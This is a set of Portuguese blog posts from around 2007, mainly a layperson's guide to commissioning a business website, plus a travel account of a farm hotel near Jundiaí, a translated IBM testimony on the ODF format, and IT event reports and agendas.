Como Criar um Website

Este guia é para você que é leigo em computadores, mas que precisa contratar alguém para fazer o site de sua empresa, restaurante, hotel, etc. Vai ajudá-lo a ter um site mais acessível, prático e funcional, usando padrões e técnicas novas e que os usuários gostam, e deixando de lado as técnicas não muito naturais da web, ou que não é de boa prática o seu uso.

Quando for comprar serviços para criar seu site, exija os seguintes pontos (os links levam para as explicações):

  1. Quero um site onde eu mesmo posso atualizar o conteúdo, como se fosse um blog.
  2. Onde hospedar o site, em que computadores ele vai rodar ?
  3. O site/blog não pode ser feito em Flash.
  4. O site/blog deve ser compatível com qualquer browser em qualquer plataforma, principalmente Firefox, Internet Explorer, Safari e Opera.
  5. Não é necessário ter uma animação de abertura.
  6. Não pode haver popups nem frames, deve ser de fácil navegação e usar permalinks semânticos.
  7. O site/blog deve conter informações objetivas e precisas.
  8. O site/blog deve usar tecnologias abertas e não-proprietárias.

Seguem os detalhes de cada ponto…

Não se chama mais site, agora é blog

Blogs estão na moda, então entre na moda.

Não é a toa. Se você disser “entre no blog do meu restaurante” ao invés de “site”, as pessoas sabem que estarão mais próximas de quem criou a informação ali, e não só da informação em sí. Na cabeça das pessoas, um site raramente é atualizado, mas um blog sempre tem novidades. O já conhecido formato de blog sugere que os visitantes poderão interagir, comentar.

Não conte para ninguém, mas site e blog são praticamente a mesma coisa, mas optando pelo formato de blog abre um leque de opções do uso de ferramentas já prontas para facilmente gerenciar seu conteúdo. Isso significa que seu site (ou blog) ficará pronto mais rápido (instantaneamente, na verdade), com mais funcionalidades, nasce bonito, e organizado de um jeito já familiar para as pessoas, além de ser interativo.

Outra vantagem de um blog é que você mesmo vai poder configurar e atualizá-lo tão facilmente quanto escreve um e-mail.

O visual de um sistema de blog como o WordPress é definido pelo tema usado. A idéia de temas pode ser comparada a uma roupa que se veste: troque de roupa e mude seu visual sem tocar no conteúdo, da mesma forma que troca-se o tema de seu blog sem interferir no conteúdo textual etc.

Há uma infinidade de temas gratuitos genéricos prontos na web, mas para uma empresa, estabelecimento, etc o ideal é contratar um webdesigner para criar (ou adaptar) um tema específico, com o seu logotipo e a sua cara. O trabalho técnico para executar esse trabalho dura aproximadamente 1 semana, e no caso do WordPress.org, o webdesigner deve ter conhecimento de PHP, além dos básicos XHTML e JavaScript (não precisa lembrar esses nomes, só garanta que seu webdesigner conhece tais tecnologias).

Em que computadores seu site vai rodar, onde hospedar ?

O custo mensal para se ter um blog/site é baxíssimo. No Brasil pode-se contratar excelentes provedores de espaço como a Insite por aproximadamente R$16 por mês. Já incluso todas as ferramentas necessárias para criar o blog, como o WordPress.org.

DreamHost bannerO provedor que escolhi para este meu site é o DreamHost que fica nos EUA. Por uns R$70 por ano eles me dão 230GB de espaço, mais banda praticamente ilimitada e um ótimo serviço. Alí pode-se rodar um blog WordPress.org, ou outros softwares que facilitarão a sua vida para gerenciar o conteúdo, seja textos, fotos, multimídia, etc: Drupal, Joomla, Gallery etc.

Seu site vai morar em computadores que rodam Linux (por oferecer maior segurança e estabilidade) e seus usuários Linux, Windows, Mac ou qualquer outro poderão navegar nele sem problema.

Evite Flash

Flash é a tecnologia que permite animações bonitinhas em sites da web, mas que começou a ser impropriamente usada para fins mais centrais de alguns sites, até o ponto enlouquecido de o site inteiro ser feito em Flash.

É ruim para seus visitantes: Flash é uma tecnologia proprietária, e nem todos os seus visitantes vão tê-lo instalado. E os que tiverem talvez o terão numa versão antiga (você lembra de ter atualizado seu Flash alguma vez?). Visitantes que usam Linux por exemplo — 20% da web aproximadamente — em geral não tem. Não exclua seus usuários.

É ruim para seu blog: Há uma ciência oculta na web chamada Search Engine Optimization (ou Otimização Para Sistemas de Busca), em que profissionais especializados conseguem fazer um site aparecer no topo da pesquisa por palavras em sites como o Google, Yahoo, MSN Search, etc. Bem, qualquer palavra ou link (isso inclui menus que levam ao texto) contidas em arquivos Flash serão invisíveis ao Google, fazendo seu blog praticamente desaparecer em resultados de busca. Os potenciais clientes que usam o Google e companhia para procurar coisas que você vende também desaparecerão.

Use Flash somente em coisas marginais e mesmo assim em elementos que não interferem na informação que seu site/blog provê.

Existem outros browsers

Lembre-se que o browser que você e seu produtor de site usam pode não ser o mesmo de todos os seus visitantes. O Firefox já usado por uns 30% da web. Para acertar neste ponto, garanta que seu blog é bem visto no Firefox, Safari (popular no Mac), Opera (popular em celulares) e Internet Explorer.

A Internet não é um panfleto de propaganda

Uma das coisas mais inúteis e irritantes de muitos sites é a tal da apresentação inicial, geralmente feita em Flash. Claro que há o link para “pular a animação” mas se este também estiver embutido no Flash pode dizer adeus a alguns visitantes: o resto de seu site é inacessível e contribui para a tal exclusão digital.

Um panfleto é recebido na rua de forma passiva, e a capa deve ser atraente para que o usuário queira abrir e ver o resto. Na Internet é diferente. Dificilmente alguém vai “cair” no seu site por acaso. As pessoas ativamente te clicaram porque acreditam que você tem a informação que elas precisam. Não as aborreça com essas apresentações iniciais. Em suma, isso só serve para duas coisas: dar uma desculpa ao webmaster que você contratou para te mostrar seus conhecimentos em operar o programa que cria aquilo, e gastar seu dinheiro pelas horas de trabalho cobradas.

Use melhor as horas pagas ao seu web-designer e peça para ele criar um site/blog semântico, que os mecanismos são capazes de ler.

Morte aos Popups

Sobre as tais janelas saltitantes que surgem quando clicamos em links de sites mal feitos, saiba que browsers modernos corretamente as bloqueiam. Se você as vê na hora que está testando seu site pela primeira vez, provavelmente foi porque o browser foi explicitamente configurado para deixá-las saltar. Em geral seus usuários não as verão.

Os popups tem outro sério problema: em sites mal feitos, certas informações preciosas só podem ser encontradas dentro de popups, e como essas janelinhas estão fora do fluxo de navegação normal (como Flash) essas informações também serão invisíveis ao Google e companhia, e não aparecerão nos resultados de busca.

Estabeleça a idéia de que todo pedaço de informação em seu site deve poder ser acessível diretamente por links externos (também conhecidos por “permalinks“), e não só navegando via a página principal.

Seus clientes querem te ligar

Você ficará surpreso em saber quantas pessoas tem preguiça de ler ou gastar 5 minutos (ou mais, se o site for desestruturado) navegando em seu blog para encontrar o que procuram.

Para aproximá-las de você, deixe seu telefone com código de área visível em todas as páginas, por exemplo no final de cada uma. Só e-mail não basta. Muito menos formulário para entrar em contato. Lembre-se: de qualquer forma, antes da Internet o único jeito de contactarem seu estabelecimento era por telefone.

Se o seu estabelecimento for um serviço, restaurante, hotel, loja, vai perceber que a maioria liga para saber onde fica, preços, se está lotado, o que há no cardápio, etc. Quando as perguntas freqüentes ficaram óbvias, trate de criar páginas com respostas claras no seu site, mapas interativos como o abaixo, etc.

map
map
Restaurante Maha Mantra
map
Cantina do Mello

Evite tecnologias proprietárias

Use padrões abertos. Eles estão disponíveis, são mais baratos, e te dão mais flexibilidade que as tecnologias proprietárias.

Não é exatamente o webdesigner quem deve escolher as tecnologias usadas em seu site. Ele vai te sugerir as que ele conhece, mas não necessariamente são as melhores para você.

Um site/blog desenvolvido com tecnologias proprietárias te forçará a ter que pagar por elas pelo resto da vida de seu site. E saiba que a cultura da Internet criou diversas tecnologias abertas, muitas vezes melhores, muitas vezes gratuitas, que te dão escolha, poder de negociação, etc.

Veja uma comparação:

Tecnologias Proprietárias (evite) Tecnologias Abertas (prefira)
Flash DHTML, Ajax, XHTML+JavaScript
ASP, ASP.NET JSP, PHP
.NET, C#, Cold Fusion, Delphi etc Java, Java Enterprise ou J2EE
Windows ou qualquer outro sistema operacional Linux
Mídia em formatos WMA, WMV e Real Mídia em formatos MP3, AAC, MPEG e Xvid (ou DivX)

Outros detalhes

  • Seu site ou blog deve usar a codificação UTF-8 ou Unicode. Esta técnica é a garantia de que acentos vão aparecer corretamente em qualquer browser e sistema operacional.
  • Evite também frames. Eles nasceram a partir de um erro de projeto, são considerados obsoletos, tem problemas similares aos popups e Flash, violam padrões, e seus criadores se arrependeram de te-los criado.

Borboletas do Japi

A 40 minutos de São Paulo está um dos melhores lugares para se passar um feriado: Fazenda Montanhas do Japi. E foi justamente nesse ótimo hotel fazenda que passamos a última Páscoa.

Encrustado nos pés da área de preservação da Serra do Japi, é longe o suficiente para abafar o barulho da cidade, e perto o suficiente para não haver desculpas nem dramas para cair na estrada. Logo ali, em Jundiaí.

(interaja com o mapa para conhecer a região)

O hotel fazenda é um complexo de 8 lagos rodeado por morros de mata virgem e flores perfumadas. É muito bem cuidado, com bosques de árvores, campos de grama aparada e borboletas, muitas borboletas. Uma visão bucólica do paraíso.

Casa principalA Casa de Pedra é a principal e tem uns 3 quartos para hóspedes, lounge, lazer, etc, e fica na subida de um morro, de frente para o lago principal, o que lhe confere uma bela vista de contemplação. Mas ficamos na Casa Gênio, afastada uns 400m (veja no mapa) e praticamente no meio do mato, com 2 suites, sala, cozinha e varanda, cujo caminho até a casa principal passa por um bosque de amoreiras, com borboletas por toda parte.

Suzana e Hanah lideram tudo não como donas de uma pousada, mas como anfitriãs em sua sala de estar, almoçando junto e contando as histórias de gerações passadas da família e da fazenda, a relação da região com a cultura da uva, e depois eucaliptos, etc.

A casa principal foi construída sobre ruínas seculares de jesuítas. Para evitar intervenções de estilos muito contrastantes, toda a arquitetura nova é rústica, mas com um inconfundível toque feminino e confortável. As constantes borboletas dão o toque final ao visual leve e colorido.

Trilhas na mataPara os aventureiros há as trilhas por dentro da Serra do Japi, beirando rios de águas cristalinas, árvores primárias, perdendo-se e achando-se ao sair em outro ponto inesperado da fazenda, despreocupadamente, guiado pelas infindáveis borboletas.

É tão perto que no sábado chamamos os amigos de São Paulo para virem almoçar e passar o dia, nadar no lago, remar no caiaque, andar a cavalo, contemplar as borboletas na paisagem florida.

É tão longe que a noite vimos um céu escuro e estrelado, típico dos lugares afastados. Aí a lua cheia logo nasceu e mandou as estrelas embora. Mas no dia seguinte, as borboletas continuavam lá.

Os bons cavalos nos levaram ao topo de um morro cuja paisagem lembrava Stonehenge. Muitas rochas. E borboletas. E o Pico-do-Jaraguá lá longe.

As redes sob os eucaliptosFazer três refeições daquelas por dia era desencorajador para nós, visitantes deslumbrados com a leveza de tantas borboletas. No café da manhã, além dos bolos e pães caseiros, deixavam umas chapas de ferro sobre o fogão a lenha para prepararmos nossos próprios sanduíches ou panquecas. Tinha que preparar sempre dois: um para matar a fome e outro para exercitar a pretensão de sanduicheiro-chapeiro-cozinheiro.

O almoço era concorrido com quem só vinha passar o dia, mas ao sentarmos nas mesas da varanda alta, contemplando os lagos e as borboletas, tudo se acalma. Se demandávamos demais do almoço, as redes de balanço sob o bosque de eucaliptos gigantes nos chamavam para um cochilo. Quanto mais altos, mais sensíveis são os eucaliptos às brisas que vem e vão, e juntos formavam o sonoro coro da canção de ninar que combinava com a rede.

Mesas na varanda altaO sino do lanche da tarde nos despertava, e aí as estrelas eram o suco de erva cidreira e a torta de banana com aveia.

À noite prometíamos tomar só uma sopa, mas não dava para resistir. A situação se complicou no sábado à noite: o forno de pizza estava quente, e a pretensão de cozinheiro pôde novamente ser exercitada ao montar as deliciosas redondas. Era a última noite.

No domingo choveu como o batismo dos céus. As borboletas foram se esconder, mas não por muito tempo. Logo voltaram.

Mas já era hora de partir. O consolo ao voltar para São Paulo era o céu de um cinza homogêneo e denso como uma redoma, mas às seis da tarde o sol atravessava-o por baixo alaranjando toda a cidade. Era um lindo jogo de contrastes brilhantes e cinzentos que fez surgir um arco-íris intenso estampado sobre o cinza. Pudemos vê-lo inteiro, de ponta a ponta. Cena de rara beleza na cidade.

Naquela hora, já em São Paulo, lembramos das borboletas. E sentimos saudades delas.

(fotografias e seus autores estão no site da fazenda)

Pré-FISL em São Paulo

Acabei de sair do evento Pré-FISL em São Paulo, organizado pela 4Linux.

Foi ótimo. Com palestras e palestrantes de alta qualidade. Confira:

  • Josh Berkus, do PostreSQL, esclareceu a evolução do projeto e comunidade. Contou que a versão 8.3 do PostreSQL vai suportar DBs de vários terabytes, e que a performance da versão 8.2 atual já é comparável com o MySQL. Contou também que os nichos do PostreSQL e do MySQL são diferentes. O primeiro está focado em grandes bancos, enquanto o MySQL tende a usos exóticos ou a bancos pequenos ou até em RAM. Sobre suporte a XML do PostgreSQL mostrou os primeiros passos, mas explicou que não chegam nem perto do DB2 nesse ponto. Outro gráfico interessante é a relação do custo-benefício comparado a um “banco de dados proprietário” de cor vermelha: 80% do benefício por 15% do custo total de propriedade.
  • Maddog fez uma apresentação de tom idealista sobre thin clients, contando como terminais burros eram usados antigamente e a vida das pessoas era mais fácil. Argumentou que o projeto One Laptop Per Child é bonito mas o que importa não é o hardware e sim a conectividade em todo lugar. Quando questionei que muitas empresas já usam thinclient mas em Windows, e que o que falta é uma abordagem de mudança cultural menos infraestrutural e mais no nível das aplicações (convertendo-as para web ou para padrões abertos), ele disse que é só uma questão de volume. Quero ver… Seja como for, nós adultos também queremos um laptop conectado !
  • Jomar Silva, diretor geral da ODF Alliance Brasil, falou por uns minutos sobre ODF e sua importância para os usuários, empresas e desenvolvedores de aplicações.
  • Cezar Taurion falou pela IBM com uma palestra entitulada “Renascimento 2.0”, onde usou seu raciocínio claro e pragmático para explicar o modelo Open Source, e como ele se encaixa num modelo empresarial. Falou sobre o conceito Long Tail e como ele está relacionado a era do Mundo de Pontas.
  • Kristian Kielhofner falou sobre o Asterisk. Muito interessante. Mas a maior sensação foi seu celular Nokia que suporta SIP. Ou seja, para qualquer contato de sua lista telefônica, ele pode fazer uma ligação normal (por GSM) ou por VoIP, gastando bytes de seu plano IP (mais barato) e economizando minutos de seu plano de voz (mais caro). Segundo ele, os aparelhos Nokia da linha E e N estão anos a frente de qualquer outro fabricante por sua integração com VoIP. Ele consegue rotear seu ramal do trabalho, ou seu telefone de casa para seu celular, não por followme, mas por IP — Nokia é o celular dos geeks. Mostrou também um gadget que parece um isqueiro com porta ethernet: trata-se de um computador com WiFi que tem 256MB de RAM e AstLinux já instalado, boota em segundos com Linux, Asterisk e um firewall, e lhe serve como uma central telefônica portátil para viagens.
  • Amauri Zavatin, da Caixa Econômica, impressionou todos contando como o banco social está aos poucos usando Linux em todos os lugares. Dentro de um ano, todos os terminais dos caixas e ATM serão thin clients Linux. BrOffice.org já está sendo massivamente usado, com ordem da presidência, e há prazo de 6 meses para desinstalar o MS Office. Intranet foi toda redesenvolvida em Java e Zope, e está servindo como piloto para a próxima Internet do banco. Diminuiram em 70% os gastos com impressão porque começaram a controlar seu uso com ferramentas open source. Des-terceirizaram todo o negócio das casas lotéricas (por causa das notícias de corrupção) redesenvolvendo todas as aplicações internamente com Java e Linux, e o projeto saiu por uma fração do que foi previsto. Etc etc etc. Esta palestra serviu como um termômetro do uso de Open Source de forma corporativa, responsável e séria.
  • Louis Suarez-Potts, da Collab.net, fez uma palestra emocionada sobre OpenOffice.org e ODF, convocando mais colaboradores para os diversos projetos atrelados ao OOo. Explicou que pode-se contribuir para a suite em sí, mas também para os subprojetos de marketing, empacotamento, artwork, testes, plugins e extensões.

O evento fechou com um coquetel informal onde reencontrei velhos amigos como o Luiz Blanes e outros.

A casa estava cheia, e espero que o evento se repita ano que vem. Tem tudo para se tornar tradição em São Paulo.

Um Tratado sobre Padrões Abertos e ODF

Bob Sutor, diretor da IBM que tem a missão de fomentar Padrões Abertos e Open Source no mercado, tem também a responsabilidade de comunicar a importância do OpenDocument Format (ou ODF).

Publicou em seu blog um pronunciamento feito ao congresso do estado do Texas, que está em fase de votar uma lei a favor da adoção do ODF. É um tratado edificante sobre a importância social e mercadológica dos Padrões Abertos (instanciados aqui no ODF). As idéias e raciocínio deste documento podem ser facilmente adaptados para serem ouvidos por qualquer orgão governamental, instituição pública ou privada do Brasil também, quanto mais agora devido a criação da nossa própria Aliança ODF.

Eis uma tradução integral:

2007/04/09: Revisada a tradução, a semântica, sintaxe e gramática por Tatiana Cymbalista.

Boa tarde/noite, Sr. Presidente e membros do Comitê. A IBM apóia este projeto de lei. Este projeto de lei trata do futuro, de mais concorrência e inovação e de dar mais opções para o Texas. É completamente consistente com a direção tecnológica e de propriedade intelectual da indústria do software.

Os atuais formatos de arquivos nos quais alguém grava documentos de escritório, usados pela maioria dos senhores e de seus cidadãos, são baseados em tecnologias e práticas dos anos 70, 80 e 90, pelas quais algumas companhias “prendiam” clientes a seus produtos e atualizações. Isso não é mais aceitável hoje em dia.

Quando os senhores e seus cidadãos encontram-se realmente restritos a um único fornecedor de software para acessar informações governamentais, vocês e eles pagam o que eu considero taxas. Padrões abertos evitam isso.

A primeira taxa é a diferença entre o que você precisa pagar para aquele fornecedor versus o custo mais baixo que pagaria se múltiplos fornecedores existissem e os preços tivessem que ser competitivos. Você também teria que pagar uma taxa de inovação. O fornecedor único tem motivos limitados para melhorar o produto. Idéias refrescantes de atores novos como os empreendedores do Texas, são mantidas fora da categoria do produto. Isso é ruim.

Aqueles que são contrários a este projeto de lei estão, em essência:

  • confortáveis em ter um único fornecedor;
  • satisfeitos com as políticas de licitação que permitem haver um único fornecedor de software de documentos para o governo;
  • razoavelmente felizes em pagar as taxas financeiras e de inovação acima.

A IBM não se contenta com este status quo. Nem os autores desse projeto de lei. Nem a maioria das indústrias; aquelas nas áreas de ciências naturais, educação, saúde, e assim por diante, que estão tendendo para padrões abertos. Com o advento da Internet, beaseada em padrões abertos como HTML, o valor dos padrões abertos reais tem sido comprovado.

Pensem sobre quão mais fácil, mais acessível, mais transparente é para vocês colaborar dentro do governo e se conectar com seus cidadãos graças à Internet e ao correio eletrônico, a blogs e a tudo aquilo que surgiu a partir de padrões abertos. É chegada a hora de levar esse poder de colaboração aos documentos e abri-los, dando controle aos governos e escolha aos cidadãos.

A IBM se juntou aos nossos colegas da indústria para trabalhar em um padrão aberto para formatos de arquivos, chamado de OASIS/ISO OpenDocument Format (ODF). Formatos de arquivos são meras especificações de como um documento é estruturado — cabeçalhos, rodapé, parágrafos — e de como ele deve ser salvo e intercambiado. O formato OpenDocument tem sido desenvolvido aberta e ativamente por uma comunidade global de especialistas de muitas organizações e tem sido amplamente implementado por vias independentes, tanto de código fonte aberto como proprietário.

Sua taxa de adoção está aumentando. Adolescentes estão usando-o. Políticos estão usando-o. Alguns diretores de tecnologia em organizações que oficialmente só usam formatos proprietários estão usando ODF em casa, quando chega a hora de gastar seu próprio dinheiro e experiência técnica para escolher produtos para seu uso pessoal. A enorme e crescente base de usuários de Open Office está gravando e distribuindo arquivos em formato ODF. A próxima geração do Lotus Notes da IBM irá suportá-lo ainda este ano.

Então por que vocês precisam de legislação sobre isso ?

Primeiro, porque o Texas, como um estado soberano e uma potência no mercado de TI, deve, na minha opinião, ser capaz de fazer o que bem entender com os documentos de escritório que cria. Isso se aplica aos documentos de hoje, mas também aos documentos que serão criados amanhã e que serão os registros históricos daqui a cinqüenta anos. Vocês têm a oportunidade de claramente afirmar a posição de que o Texas não será refém de nenhum fornecedor para acessar as informações do próprio estado.

Segundo, porque as mudanças estão acontecendo agora e os usuários vão, ao longo do tempo, usar novas aplicações com novos formatos de arquivos baseados em documento. Eu nunca encontrei um diretor de tecnologia ou pessoa da área de finanças que me dissesse que nunca usará um novo software. Então, uma encruzilhada aproxima-se rapidamente e vocês precisam fazer uma escolha: escolher um único fornecedor e pagar essas taxas que mencionei, ou adotar formatos de documentos verdadeiramente abertos, que não são ditados por um único fornecedor, fomentam competição e inovação de várias origens e provêm verdadeira escolha de provedores e seus produtos.

Eu posso garantir que o software que teremos em cinqüenta anos vai funcionar de formas radicalmente diferentes e será fornecido por provedores completamente diferentes dos que conhecemos hoje. Devemos manter nossas opções abertas e, felizmente, com ODF temos uma excelente escolha comparada com qualquer alternativa. Além do mais, pessoalmente, eu apostaria na “inteligência das massas”, na coletividade de experts em TI que verdadeiramente domina padrões abertos e poderá nos preparar para o sucesso nos próximos anos. Depender de um único fornecedor para otimizar as ferramentas de seu próprio sucesso é solução do passado.

Em terceiro lugar, para ser claro, QUALQUER UM pode implementar um padrão aberto. Esse projeto de lei trata de escolha. ODF e padrões abertos para formatos de arquivos fomentam escolha de aplicações, usos inovadores da informação, mais competição e queda de preços. Pessoalmente, eu acho que essas coisas são boas.

Em conclusão, o mundo está se deslocando para padrões abertos, não-proprietários, baseado no incrível sucesso da Internet, um sucesso que foi bem mais importante do que a posição de mercado de um único fornecedor ou as suas idéias sobre o que seria correto para o mundo.
Nós podemos fazer isso novamente, mas temos que fazê-lo com cuidado. O Estado do Texas está em posição de mostrar aos seus cidadãos e ao mundo que esse sucesso pode ser repetido e que pretende liderar esse processo. O Texas pode mostrar que a frase “padrão aberto” significa mais do que um departamento de marketing de uma empresa diz que é.

Sr. Presidente e membros do comitê, padrões abertos de documentos são a apólice de seguro para seus documentos, em oposição ao risco de perda de documentos históricos esperando para acontecer. Eu vos agradeço pela oportunidade de testemunhar a favor do projeto de lei, e estou a disposição para responder a qualquer dúvida que tiverem.

Mapas Personalizados no Google Maps

Confira o novo Google Maps, que já era na minha opinião o serviço mais prático e legal da Internet.

A partir de hoje (não lembro de ter visto isso ontem) pode-se criar mapas personalizados com marcadores coloridos e balões com informações formatadas, como este mapa com legendas de Paraty e região.

Além do mais, pode-se exportar essas informações para um arquivo KML, importável no Google Earth. Mas como KML é um idioma XML aberto, pode-se usa-lo como meta informações geográficas em quaisquer outras aplicações. A imaginação do desenvolvedor de aplicações é o limite. Discretamente, KML irá se tornar um padrão aberto e universal para descrever metainformações em mapas.

Havia desenvolvido um plugin para WordPress (ou qualquer outro sistema de blog, ou página simples) para embarcar mapas interativos dentro de posts, capaz de incrementar posts como este (na verdade, a maioria de meus posts sobre viagens tem mapas interativos). Ele ainda é muito prático, porque a API do Google Maps ainda não provê um serviço para desenhar os novos mapas personalizados fora do próprio Google Maps. Mas duvido que isso demore a acontecer, e quando acontecer, das duas uma: ou o plugin vai ficar muito mais simples, ou ele vai se tornar completamente obsoleto.

Eu sou tão fascinado por mapas que provavelmente fui um cartógrafo em outra encarnação.

E para quem não sabe, o Google Maps e o GMail são os sites populares que primeiro usaram os conceitos de AJAX.

Evento de Virtualização da Novell

Novell Virtualization Tour

Não podemos deixar de marcar nossa presença no evento de virtualização da Novell. Confira as datas e cidades:

Brasil América Latina

No track da IBM vou fazer uma apresentação nova sobre virtualização, incluindo o tema quente da paravirtualização, mas passando também por virtualização de storage, virtualização de aplicações, e outras virtualizações pouco conhecidas, até chegar nos conceitos de Grid e SOA que são as vertentes mais sofisticadas de virtualização.

Inscreva-se gratuitamente nos links acima e garanta sua vaga.

ODF Alliance, Capítulo Brasil

Foi anunciada ontem para a mídia a ODF Alliance – Chapter Brasil. Somos o terceiro país no mundo que criou esta iniciativa, depois da Polônia e da Índia.

Tem como membros fundadores as sucursais brasileiras da IBM, Red Hat, Sun e Jomar Silva como diretor, que me contou o seguinte:

Eu entendo que a operação brasileira tem como missão e papel realizar o trabalho proposto pela ODF Alliance em território brasileiro. Somos todos parceiros e lutamos juntos a mesma batalha, trocando experiências (e este é um ponto muito importante) para que as lições aprendidas com a migração e adoção do ODF por outros países (governos e empresas) possam ser utilizadas aqui.

Diversos softwares já oferecem hoje suporte de leitura e escrita de arquivos no formato OpenDocument, sendo o mais conhecido a universal suite OpenOffice.org. O usuário então ganha com isso liberdade de escolha, poder de negociação, e poder optar pela melhor relação custo-benefício. Essa dinâmica usuário-fabricantes funciona como combustível para a inovação.

ODF é um patrimônio de seus usuários e da humanidade. Baseado em padrões abertos como XML, somado aos fatos de ter uma licensa de uso livre, e de já ser um padrão ISO (dois passos à frente do OOXML, concorrente proprietário da Microsoft), assinala um marco na história da TI onde pela primeira vez o usuário é verdadeiramente dono independente de seus próprios dados, garantindo assim sua longevidade e interoperabilidade. É simplesmente uma idéia muito poderosa.

O ODF Alliance – Chapter Brasil tratará, em seus primeiros dias de vida, de levantar seu site em português — provavelmente em www.br.odfalliance.org —, e em definir critérios para receber novos membros, como empresas, instituições, grupos de usuários e comunidades.

Inclusão Digital

Já posso desencarnar feliz porque tenho um blog popular.

Meu post sobre Aquecimento Global é o campeão de audiência com 246 comentários neste exato momento, mas se você for verificar agora, o número já deve ter crescido. Até o final do ano deve facilmente chegar a 400 comentários.

Escrito numa noite mal dormida, de pesadelos, após ter assistido o filme do Al Gore, nunca tinha imaginado que seria tão visitado, e nem por esse tipo de público: a maioria são estudantes fazendo trabalho para a escola.

Uma conhecida que corrige redações de vestibular me disse uma vez que o nível dos textos é muito baixo. Confesso que achei que ela estava exagerando e sendo pessimista demais, mas minha opinião mudou depois do meu post popular.

Veja alguns comentários ali:

E a lista não pára…

A inclusão digital está acontecendo mais rápido do que qualquer outra inclusão.

Aproveitando, meus outros posts populares são o de download de música, o do Google Maps para WordPress, e o do tema do meu blog.

IBM no Oracle Open World

A IBM vai participar do evento Oracle Open World, nos dias próximos dias 27, 28 e 29 de março.

Local

Transamérica Expo Center, São Paulo.

Agenda

Parceiros, Cezar Taurion, outros especialistas da IBM e também eu, vamos mostrar casos de sucesso e novas idéias sobre diversos assuntos, inclusive Linux, Service Oriented Architecture, Padrões Abertos, Software as a Service, novidades nas plataformas de hardware da IBM etc. Confira a agenda:

Dia 27/03

11h00 – 11h40 System p (Unix) para Soluções Oracle

Conheça a tecnologia POWER IBM, com todo poder de processamento e capacidades avançadas de virtualização e alocação dinâmica de recursos. Ideal para empresas com missão crítica e com necessidades de flexibilização da sua área de TI, além de ser uma combinação perfeita com diversas soluções Oracle.

Palestrante: Mauro Minomizaki

11h45 – 12h15 Caso de sucesso – Unilever: Buscando a excelência através da implementação de ITIL

Com a implementação dos processos ITIL suportados pelo Siebel, a área de IT da Unilever Latin America busca consolidar sua excelência operacional para entregar aos seus clientes um serviço cada vez melhor.

Palestrante: José Ferroli (Unilever)

14h00 – 14h40 Modelos de negócio para padrões abertos e open source

A importância dos Padrões Abertos para a indústria e sociedade. Como empresas estão tirando vantagem disso. Modelos de negócios para Open Source, e como escolher entre Open Source e Closed Source.

Palestrante: Cesar Taurion (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma lexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: MPL

Soluções para empresas em que a performance dos projetos e gerenciamento dos riscos são críticos. Controle os custos de seus projetos em tempo real.

Palestrante: MPL

16h10 – 16h40 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h40 – 17h20 IBM Service Management for Oracle Applications – Oracle Optimization and Management

O IBM Service Management alavanca as práticas ITIL para reduzir tempo, custo e risco na entrega e gerenciamento de aplicações Oracle em ambientes heterogêneos, ajudando as empresas a reduzir o custo total de suas operações e a liberar os orçamentos para investimentos em inovação.

Palestrante: Jorge Cordenonsi

17h20 – 18h00 Por que Oracle no mainframe?

A Oracle e a IBM anunciaram em Outubro de 2006 uma forte parceria de aplicativos e Banco de Dados em plataforma mainframe – System z. Além disso, algumas dessas tecnologias já estão rodando em ambiente Linux do mainframe, com um ótimo TCO para clientes que buscam consolidação.

Palestrante: Roberto Santos (IBM)

18h00 – 19h00 Coquetel System z

Dia 28/03

11h00 – 11h40 Soluções Mid-Range de Storage para Oracle

Conheça as soluções voltadas ao mercado de pequenas e médias empresas, onde o volume de dados vem crescendo a cada dia. Além disso, veja os diferenciais com soluções Oracle e os últimos lançamentos voltados para esse mercado.

Palestrante: Wellington Menegasso

14h00 – 14h40 Sizing de Infraestrutura para Soluções Oracle

Veja como a IBM investe fortemente em seu Centro de Competência, bem como na ferramenta de sizing, garantindo o bom funcionamento do seu processo e trazendo economia às empresas, além de ser uma ótima oportunidade aos nossos parceiros de negócios.

Palestrante: Guilherme Araujo (IBM)

14h50 – 15h20 Software como Serviço: rompendo os limites do modelo de aplicativos sob demanda

Conheça esta forte tendência do mercado, o modelo de software como serviços. Uma forma flexível de compra de soluções que consiste na entrega das funcionalidades de uma aplicação com o pagamento baseado em sua utilização.

Palestrante: Marcos Prete (IBM)

15h30 – 16h00 Parceiro: HB Global

Soluções JD Edwards Oracle para Transporte e Logísitica

Palestrante: HB Global

16h00 – 16h30 Soluções financeiras para viabilizar seu projeto

O Banco IBM apresenta uma série de alternativas para viabilizar seu projeto de TI. Conheça as melhores e mais variadas soluções financeiras para levar seu projeto adiante.

Palestrante: André Sales (IBM); Antonio Ramos (IBM)

16h30 – 17h10 Soluções Siebel com plataforma Unix IBM

Conheça as funcionalidades de nossa plataforma System p (UNIX) com o aplicativo Siebel Oracle, mostrando todo o valor agregado e benefícios que as empresas podem ter optando por essa solução.

Palestrante: Eduardo Pacini (IBM) e Sérgio Saldanha (Oracle)

17h20 – 18h00 Power Net – um programa direcionado para ISVs

PowerNet é um programa voltado a desenvolvimento de novos ISVs na plataforma System p. Venha conhecer todos os benefícios do programa e como a IBM está trabalhando com a Oracle. Extremamente focado para parceiros de negócios.

Palestrante: Marcelo Violento (IBM) e Sérgio Saldanha (Oracle)

18h00 – 19h00 Coquetel System p

Dia 29/03

11h00 – 11h40 Bladecenter com Soluções Oracle

Cada vez mais as empresas enfrentam problemas como redução de custos na área de TI, falta de espaço, problemas de refrigeração do seu CPD e gerenciamento de parques de servidores. O BladeCenter IBM pode resolver todos esses problemas com sua capacidade de

Palestrante: Ana Paula Tran

11h45 – 12h15 Caso de sucesso: Como atingir a otimização de processos com redução de custos e redução do número de transações de documentos em até 50%.

Melhoria do gerenciamento de risco, redução das complicações relacionadas a impostos e legais, melhoria da qualidade dos dados, maior cooperação dos empregados, otimização das ações da corporação, com maior rapidez nas soluções de possíveis dificuldades a

Palestrante: CVRD

14h00 – 14h40 A melhor distribuição Linux

Entenda o que são distribuições Linux, como estão posicionadas no mercado e na comunidade, as mais importantes, vantagens e desvantagens de cada uma, e como escolher a melhor para o seu negócio.
